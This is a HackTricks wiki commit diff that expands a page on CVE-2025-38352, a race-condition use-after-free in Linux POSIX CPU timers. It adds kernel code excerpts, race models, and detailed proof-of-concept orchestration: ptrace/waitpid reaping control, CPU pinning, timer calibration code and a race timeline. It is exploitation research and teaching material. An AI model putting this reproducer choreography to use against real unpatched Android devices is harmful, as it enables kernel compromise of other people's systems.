Merge pull request #1706 from HackTricks-wiki/update_CVE-2025-38352___In-the-wild_Android_Kernel_Vulner_20251222_130353

carlospolop · web-flow · commit a807923846bc · 2025-12-29T12:08:54.000+01:00
CVE-2025-38352 – In-the-wild Android Kernel Vulnerability An...
diff --git a/src/linux-hardening/privilege-escalation/linux-kernel-exploitation/posix-cpu-timers-toctou-cve-2025-38352.md b/src/linux-hardening/privilege-escalation/linux-kernel-exploitation/posix-cpu-timers-toctou-cve-2025-38352.md
@@ -80,6 +80,9 @@ Two expiry-processing modes
 - CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y: expiry is deferred via task_work on the target task
 - CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n: expiry handled directly in IRQ context
 
+<details>
+<summary>Task_work vs IRQ expiry paths</summary>
+
 ```c
 void run_posix_cpu_timers(void) {
     struct task_struct *tsk = current;
@@ -100,8 +103,13 @@ static inline void __run_posix_cpu_timers(struct task_struct *tsk) {
 #endif
 ```
 
+</details>
+
 In the IRQ-context path, the firing list is processed after the sighand lock has been dropped:
 
+<details>
+<summary>IRQ-context delivery loop</summary>
+
 ```c
 static void handle_posix_cpu_timers(struct task_struct *tsk) {
     struct k_itimer *timer, *next; unsigned long flags, start;
@@ -126,6 +134,8 @@ static void handle_posix_cpu_timers(struct task_struct *tsk) {
 }
 ```
 
+</details>
+
 Root cause: TOCTOU between IRQ-time expiry and concurrent deletion under task exit
 Preconditions
 - CONFIG_POSIX_CPU_TIMERS_TASK_WORK is disabled (IRQ path in use)
@@ -139,6 +149,52 @@ Sequence
 4) Immediately after unlock, the exiting task can be reaped; a sibling thread executes posix_cpu_timer_del().
 5) In this window, posix_cpu_timer_del() may fail to acquire state via cpu_timer_task_rcu()/lock_task_sighand() and thus skip the normal in-flight guard that checks timer->it.cpu.firing. Deletion proceeds as if not firing, corrupting state while expiry is being handled, leading to crashes/UB.
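+
+The five steps can be replayed as a deterministic, single-threaded user-space model. This is a simplified sketch, not kernel code: `struct model_task`, `struct model_timer`, `model_timer_del()` and `replay_race()` are hypothetical names, the `has_sighand` flag stands in for lock_task_sighand() succeeding, and `MODEL_TIMER_RETRY` merely plays the role of TIMER_RETRY. It only illustrates why deletion reports success while delivery still holds the timer when reaping lands between unlock and delete.
+
+```c
+#include <stdbool.h>
+
+#define MODEL_TIMER_RETRY 1   /* plays the role of the kernel's TIMER_RETRY */
+
+struct model_task  { bool has_sighand; };   /* false once __exit_signal() ran */
+struct model_timer { bool firing; bool freed; };
+
+/* Decision logic of posix_cpu_timer_del(): the in-flight `firing` guard is
+ * only consulted when the sighand lock could be taken. */
+static int model_timer_del(const struct model_task *t, const struct model_timer *tm)
+{
+    if (!t->has_sighand)
+        return 0;                  /* lock failed: ret stays 0, firing unchecked */
+    if (tm->firing)
+        return MODEL_TIMER_RETRY;  /* normal path: caller waits and retries */
+    return 0;
+}
+
+/* Replays steps 1-5 in order. Returns true if IRQ-side delivery would still
+ * use a timer that timer_delete() already handed to the free path. */
+static bool replay_race(bool reap_before_delete)
+{
+    struct model_task  task  = { .has_sighand = true };
+    struct model_timer timer = { .firing = false, .freed = false };
+
+    timer.firing = true;            /* expiry collects the timer under sighand lock */
+    /* unlock_task_sighand(): the firing list is now walked without the lock */
+    if (reap_before_delete)
+        task.has_sighand = false;   /* waitpid() -> release_task() -> __exit_signal() */
+
+    if (model_timer_del(&task, &timer) == 0)
+        timer.freed = true;         /* timer_delete() proceeds to the RCU free */
+
+    return timer.freed && timer.firing;   /* delivery has not finished yet */
+}
+```
+
+`replay_race(true)` models the vulnerable ordering and returns true; `replay_race(false)` keeps sighand alive, so the `firing` guard forces a retry and the timer is never freed under the deliverer.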
 
+### How release_task() and timer_delete() free firing timers
+Even after handle_posix_cpu_timers() has moved the timer off the task's timer list and dropped the sighand lock, a ptraced zombie can still be reaped. The waitpid() path drives release_task() → __exit_signal(), which detaches and releases sighand and flushes the pending signal queue while another CPU still holds a pointer to the timer object:
+
+```c
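+static void __exit_signal(struct task_struct *tsk)
+{
+    struct sighand_struct *sighand;
+
+    sighand = rcu_dereference_check(tsk->sighand,
+                                    lockdep_tasklist_lock_is_held());
+    spin_lock(&sighand->siglock);
+    // ... posix_cpu_timers_exit(), accounting, __unhash_process() elided ...
+    flush_sigqueue(&tsk->pending);
+    tsk->sighand = NULL;             // makes future lock_task_sighand() fail
+    spin_unlock(&sighand->siglock);
+    __cleanup_sighand(sighand);
+}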
+```
+
+With sighand detached, timer_delete() still returns success because posix_cpu_timer_del() leaves `ret = 0` when locking fails, so the syscall proceeds to free the object via RCU:
+
+```c
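+static int posix_cpu_timer_del(struct k_itimer *timer)
+{
+    struct task_struct *p;
+    unsigned long flags;
+    int ret = 0;
+    rcu_read_lock();
+    p = cpu_timer_task_rcu(timer);
+    if (!p || !lock_task_sighand(p, &flags))
+        goto out;                   // ret stays 0 -> userland sees success
+    if (timer->it.cpu.firing)
+        ret = TIMER_RETRY;          // in-flight guard, never reached via the goto
+    // ... disarm_timer(), unlock_task_sighand() elided ...
+out:
+    rcu_read_unlock();
+    return ret;
+}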
+```
+
+```c
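+SYSCALL_DEFINE1(timer_delete, timer_t, timer_id)
+{
+    unsigned long flags;
+    struct k_itimer *timer = lock_timer(timer_id, &flags);
+
+    if (!timer)
+        return -EINVAL;
+    if (timer_delete_hook(timer) == TIMER_RETRY)   // not taken: del already returned 0
+        timer = timer_wait_running(timer, &flags); // upstream loops back and re-checks
+    // ... list_del(), unlock_timer() elided ...
+    posix_timer_unhash_and_free(timer);            // call_rcu(k_itimer_rcu_free)
+    return 0;
+}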
+```
+
+Because the slab object is RCU-freed while IRQ context still walks the `firing` list, reuse of the timer cache becomes a UAF primitive.
+
+### Steering reaping with ptrace + waitpid
+The easiest way to keep a zombie around without it being auto-reaped is to ptrace a non-leader worker thread. exit_notify() first sets `exit_state = EXIT_ZOMBIE` and only transitions to EXIT_DEAD if `autoreap` is true. For a ptraced thread, `autoreap = do_notify_parent()` stays false (the SIGCHLD-ignored autoreap shortcut in do_notify_parent() only applies to untraced tasks), so release_task() only runs when the parent explicitly calls waitpid():
+
+- Use pthread_create() inside the tracee so the victim is not the thread-group leader (wait_task_zombie() handles ptraced non-leaders).
+- Parent issues `ptrace(PTRACE_ATTACH, tid, NULL, NULL)` and later `waitpid(tid, NULL, __WALL)` to drive do_wait_pid() → wait_task_zombie() → release_task().
+- Pipes or shared memory convey the exact TID to the parent so the correct worker is reaped on demand.
+
+This choreography opens a window in which handle_posix_cpu_timers() still holds the collected timer after dropping the `tsk->sighand` lock, while a subsequent waitpid() tears sighand down and lets timer_delete() reclaim the same k_itimer object.
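+
+The reaping decision can be condensed into a small model. This is a simplified sketch rather than kernel code: `model_autoreap()` is a hypothetical helper that folds exit_notify() and the SIGCHLD-ignore check in do_notify_parent() together, and it assumes the thread-group leader's exit_signal is SIGCHLD.
+
+```c
+#include <stdbool.h>
+
+/* Simplified model of exit_notify()'s autoreap decision, assuming the
+ * leader's exit_signal is SIGCHLD. true: the task goes straight to EXIT_DEAD
+ * and release_task() runs without any waitpid(); false: it stays EXIT_ZOMBIE. */
+static bool model_autoreap(bool ptraced, bool leader, bool group_empty,
+                           bool parent_ignores_sigchld)
+{
+    if (ptraced)
+        return false;  /* do_notify_parent() only autoreaps untraced tasks */
+    if (leader)
+        return group_empty && parent_ignores_sigchld;
+    return true;       /* untraced non-leader threads are released immediately */
+}
+```
+
+Only the ptraced branch leaves a non-leader worker parked in EXIT_ZOMBIE, which is why the reproducer attaches to the worker TID and defers release_task() to an explicit waitpid().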
+
 Why TASK_WORK mode is safe by design
 - With CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y, expiry is deferred to task_work; exit_task_work runs before exit_notify, so the IRQ-time overlap with reaping does not occur.
 - Even then, if the task is already exiting, task_work_add() fails; gating on exit_state makes both modes consistent.
@@ -159,7 +215,18 @@ Impact
 
 Triggering the bug (safe, reproducible conditions)
 Build/config
-- Ensure CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n and use a kernel without the exit_state gating fix.
+- Ensure CONFIG_POSIX_CPU_TIMERS_TASK_WORK=n and use a kernel without the exit_state gating fix. On x86/arm64 the option is normally forced on via HAVE_POSIX_CPU_TIMERS_TASK_WORK, so researchers often patch `kernel/time/Kconfig` to expose a manual toggle:
+
+```
+config POSIX_CPU_TIMERS_TASK_WORK
+    bool "CVE-2025-38352: POSIX CPU timers task_work toggle" if EXPERT
+    depends on POSIX_TIMERS && HAVE_POSIX_CPU_TIMERS_TASK_WORK
+    default y
+```
+
+This mirrors what Android vendors did for analysis builds; upstream x86_64 and arm64 force HAVE_POSIX_CPU_TIMERS_TASK_WORK=y, so the vulnerable IRQ path mainly exists on 32-bit Android kernels where the option is compiled out.
+
+- Run on a multi-core VM (e.g., QEMU `-smp cores=4`) so parent, child main, and worker threads can stay pinned to dedicated CPUs.
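+
+To confirm which expiry path a test kernel actually uses, the build's `.config` (or `zcat /proc/config.gz` output when CONFIG_IKCONFIG_PROC is enabled) can be checked for the option. A minimal sketch, assuming the standard Kconfig output format (`CONFIG_X=y` or `# CONFIG_X is not set`); `task_work_mode()` is a hypothetical helper, and a missing line is reported as unknown rather than guessed.
+
+```c
+#include <string.h>
+
+/* Returns 1 if task_work expiry is enabled, 0 if explicitly disabled
+ * (IRQ-context expiry), -1 if the option does not appear at all. */
+static int task_work_mode(const char *config_text)
+{
+    static const char on[]  = "CONFIG_POSIX_CPU_TIMERS_TASK_WORK=y";
+    static const char off[] = "# CONFIG_POSIX_CPU_TIMERS_TASK_WORK is not set";
+    const char *line = config_text;
+
+    while (line && *line) {
+        const char *end = strchr(line, '\n');
+        size_t len = end ? (size_t)(end - line) : strlen(line);
+
+        /* Compare whole lines so the CONFIG_HAVE_... capability symbol never matches */
+        if (len == sizeof(on) - 1 && strncmp(line, on, len) == 0)
+            return 1;
+        if (len == sizeof(off) - 1 && strncmp(line, off, len) == 0)
+            return 0;
+        line = end ? end + 1 : NULL;
+    }
+    return -1;
+}
+```
+
+Matching whole lines avoids false hits from naive substring searches such as `POSIX_CPU_TIMERS_TASK_WORK=y`, which would also match the CONFIG_HAVE_POSIX_CPU_TIMERS_TASK_WORK capability symbol.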
 
 Runtime strategy
 - Target a thread that is about to exit and attach a CPU timer to it (per-thread or process-wide clock):
@@ -191,9 +258,58 @@ void *deleter(void *arg) {
 
 - Race amplifiers: high scheduler tick rate, CPU load, repeated thread exit/re-create cycles. The crash typically manifests when posix_cpu_timer_del() fails to notice `firing` because the task lookup or sighand locking fails right after unlock_task_sighand().
 
-Detection and hardening
-- Mitigation: apply the exit_state guard; prefer enabling CONFIG_POSIX_CPU_TIMERS_TASK_WORK when feasible.
-- Observability: add tracepoints/WARN_ONCE around unlock_task_sighand()/posix_cpu_timer_del(); alert when it.cpu.firing==1 is observed together with failed cpu_timer_task_rcu()/lock_task_sighand(); watch for timerqueue inconsistencies around task exit.
+### Practical PoC orchestration
+#### Thread & IPC choreography
+A reliable reproducer forks into a ptracing parent and a child that spawns the vulnerable worker thread. Two pipes (`c2p`, `p2c`) deliver the worker TID and gate each phase, while a `pthread_barrier_t` prevents the worker from arming its timer until the parent has attached. Each process or thread is pinned with `sched_setaffinity()` (e.g., parent on CPU1, child main on CPU0, worker on CPU2) to minimize scheduler noise and keep the race reproducible.
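+
+The pinning and TID handoff can be sketched with standard Linux calls. These are illustrative helpers, not code from the referenced PoC: `pin_to_cpu()`, `first_allowed_cpu()`, `send_tid()` and `recv_tid()` are hypothetical names, and the sketch assumes glibc with `_GNU_SOURCE` (for `cpu_set_t`) and a fixed-size `pid_t` message on a pipe, which a single write smaller than PIPE_BUF delivers atomically.
+
+```c
+#define _GNU_SOURCE
+#include <sched.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+/* Pin the calling thread (pid 0 = self) to a single CPU. */
+static int pin_to_cpu(int cpu)
+{
+    cpu_set_t set;
+    CPU_ZERO(&set);
+    CPU_SET(cpu, &set);
+    return sched_setaffinity(0, sizeof(set), &set);
+}
+
+/* Lowest CPU the current affinity mask allows, or -1 on error. */
+static int first_allowed_cpu(void)
+{
+    cpu_set_t set;
+    if (sched_getaffinity(0, sizeof(set), &set) != 0)
+        return -1;
+    for (int cpu = 0; cpu < CPU_SETSIZE; cpu++)
+        if (CPU_ISSET(cpu, &set))
+            return cpu;
+    return -1;
+}
+
+/* Worker side: report the caller's kernel TID (what ptrace/waitpid need). */
+static int send_tid(int wfd)
+{
+    pid_t tid = (pid_t)syscall(SYS_gettid);
+    return write(wfd, &tid, sizeof(tid)) == (ssize_t)sizeof(tid) ? 0 : -1;
+}
+
+/* Parent side: block until the TID arrives; -1 on a short read or error. */
+static pid_t recv_tid(int rfd)
+{
+    pid_t tid;
+    return read(rfd, &tid, sizeof(tid)) == (ssize_t)sizeof(tid) ? tid : -1;
+}
+```
+
+In this arrangement a worker calling `send_tid()` on the write end of `c2p` reports its own TID, while the parent blocks in `recv_tid()` on the read end before issuing PTRACE_ATTACH; each side calls `pin_to_cpu()` with its assigned CPU first.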
+
+#### Timer calibration with CLOCK_THREAD_CPUTIME_ID
+The worker arms a per-thread CPU timer so that only its own CPU consumption advances the deadline. A tunable `wait_time` (default ≈250 µs of CPU time) plus a bounded busy loop are tuned so that `exit_notify()` sets `EXIT_ZOMBIE` just as the timer is about to fire:
+
+<details>
+<summary>Minimal per-thread CPU timer skeleton</summary>
+
+```c
+#include <pthread.h>
+#include <signal.h>
+#include <stdio.h>
+#include <time.h>
+
+static timer_t timer;
+static pthread_barrier_t barrier;  // assumed: initialized by child main with count 2
+static long wait_time = 250000;    // nanoseconds of CPU time
+
+static void timer_fire(union sigval unused) {
+    (void)unused;
+    puts("timer fired");
+}
+
+static void *worker(void *arg) {
+    (void)arg;
+    struct sigevent sev = {0};
+    sev.sigev_notify = SIGEV_THREAD;
+    sev.sigev_notify_function = timer_fire;
+    if (timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &timer) != 0) {
+        perror("timer_create");
+        return NULL;
+    }
+
+    struct itimerspec ts = {
+        .it_interval = {0, 0},
+        .it_value    = {0, wait_time},
+    };
+
+    pthread_barrier_wait(&barrier);  // released by child main after ptrace attach
+    timer_settime(timer, 0, &ts, NULL);
+
+    for (volatile int i = 0; i < 1000000; i++); // burn CPU before exiting
+    return NULL;                                 // do_exit() keeps burning CPU
+}
+```
+
+</details>
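+
+When tuning `wait_time`, it helps to measure how much thread CPU time the busy loop really consumes on the target machine. A minimal calibration sketch, assuming POSIX `clock_gettime()` with CLOCK_THREAD_CPUTIME_ID (the same clock the worker's timer counts against); `thread_cpu_ns()` and `burn_thread_cpu()` are hypothetical helpers, not part of the referenced PoC.
+
+```c
+#include <time.h>
+
+/* Current thread's consumed CPU time in nanoseconds (-1 on error). */
+static long long thread_cpu_ns(void)
+{
+    struct timespec ts;
+    if (clock_gettime(CLOCK_THREAD_CPUTIME_ID, &ts) != 0)
+        return -1;
+    return (long long)ts.tv_sec * 1000000000LL + ts.tv_nsec;
+}
+
+/* Spin until this thread has burned at least `budget_ns` of CPU time.
+ * Returns the CPU time actually consumed, or -1 on error. */
+static long long burn_thread_cpu(long long budget_ns)
+{
+    long long start = thread_cpu_ns();
+    if (start < 0)
+        return -1;
+    long long now = start;
+    while (now - start < budget_ns) {
+        now = thread_cpu_ns();
+        if (now < 0)
+            return -1;
+    }
+    return now - start;
+}
+```
+
+Comparing the value returned by `burn_thread_cpu(wait_time)` with `wait_time` shows how much overshoot the loop adds. The timer itself can still fire later than its deadline, because CPU-timer expiry is normally detected from the scheduler tick via update_process_times() → run_posix_cpu_timers().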
+
+#### Race timeline
+1. Child tells the parent the worker TID via `c2p`, then blocks on the barrier.
+2. Parent `PTRACE_ATTACH`es, waits for the attach stop with `waitpid(tid, NULL, __WALL)`, then issues `PTRACE_CONT` to let the worker run and exit.
+3. When heuristics (or manual operator input) suggest the timer was collected into the IRQ-side `firing` list, the parent calls `waitpid(tid, NULL, __WALL)` again to trigger release_task() and drop `tsk->sighand`.
+4. Parent signals the child over `p2c` so child main can call `timer_delete(timer)` and immediately run a helper such as `wait_for_rcu()` until the timer’s RCU callback completes.
+5. IRQ context eventually resumes `handle_posix_cpu_timers()` and dereferences the freed `struct k_itimer`, tripping KASAN or WARN_ON()s.
+
+#### Optional kernel instrumentation
+For research setups, injecting a debug-only `mdelay(500)` inside handle_posix_cpu_timers() when `!strcmp(tsk->comm, "SLOWME")` widens the window so the above choreography almost always wins the race. The same PoC also renames threads (`prctl(PR_SET_NAME, ...)`) so kernel logs and breakpoints confirm the expected worker is being reaped.
+
+### Instrumentation cues during exploitation
+- Add tracepoints/WARN_ONCE around unlock_task_sighand()/posix_cpu_timer_del() to spot cases where `it.cpu.firing==1` coincides with failed cpu_timer_task_rcu()/lock_task_sighand(); monitor timerqueue consistency when the victim exits.
+- KASAN typically reports `slab-use-after-free` inside posix_timer_queue_signal(), while non-KASAN kernels log WARN_ON_ONCE() from send_sigqueue() when the race lands, giving a quick success indicator.
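+
+For repeated runs, the kernel log can be triaged automatically. A rough sketch, assuming the usual KASAN report prefix (`BUG: KASAN: slab-use-after-free in <function>`) and the `WARNING: CPU: ... at <file>:<line> <function>+...` line that WARN_ON_ONCE() prints; `classify_race_log()` and `enum race_result` are hypothetical names.
+
+```c
+#include <string.h>
+
+enum race_result { RACE_NONE = 0, RACE_WARN = 1, RACE_KASAN_UAF = 2 };
+
+/* Scan kernel log text for the two success indicators listed above. */
+static enum race_result classify_race_log(const char *log)
+{
+    if (strstr(log, "KASAN: slab-use-after-free in posix_timer_queue_signal"))
+        return RACE_KASAN_UAF;
+
+    /* Look for a WARNING: line whose reported call site is send_sigqueue() */
+    for (const char *p = strstr(log, "WARNING:"); p; p = strstr(p + 1, "WARNING:")) {
+        const char *eol = strchr(p, '\n');
+        const char *hit = strstr(p, "send_sigqueue");
+        if (hit && (!eol || hit < eol))
+            return RACE_WARN;
+    }
+    return RACE_NONE;
+}
+```
+
+Feeding it the captured `dmesg` text after each iteration gives a quick pass/fail signal without reading every report by hand.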
 
 Audit hotspots (for reviewers)
 - update_process_times() → run_posix_cpu_timers() (IRQ)
@@ -209,5 +325,8 @@ Notes for exploitation research
 - [Race Against Time in the Kernel’s Clockwork (StreyPaws)](https://streypaws.github.io/posts/Race-Against-Time-in-the-Kernel-Clockwork/)
 - [Android security bulletin – September 2025](https://source.android.com/docs/security/bulletin/2025-09-01)
 - [Android common kernel patch commit 157f357d50b5…](https://android.googlesource.com/kernel/common/+/157f357d50b5038e5eaad0b2b438f923ac40afeb%5E%21/#F0)
+- [CVE-2025-38352 – In-the-wild Android Kernel Vulnerability Analysis and PoC](https://faith2dxy.xyz/2025-12-22/cve_2025_38352_analysis/)
+- [poc-CVE-2025-38352 (GitHub)](https://github.com/farazsth98/poc-CVE-2025-38352)
+- [Linux stable fix commit f90fff1e152d](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=f90fff1e152dedf52b932240ebbd670d83330eca)
 
 {{#include ../../../banners/hacktricks-training.md}}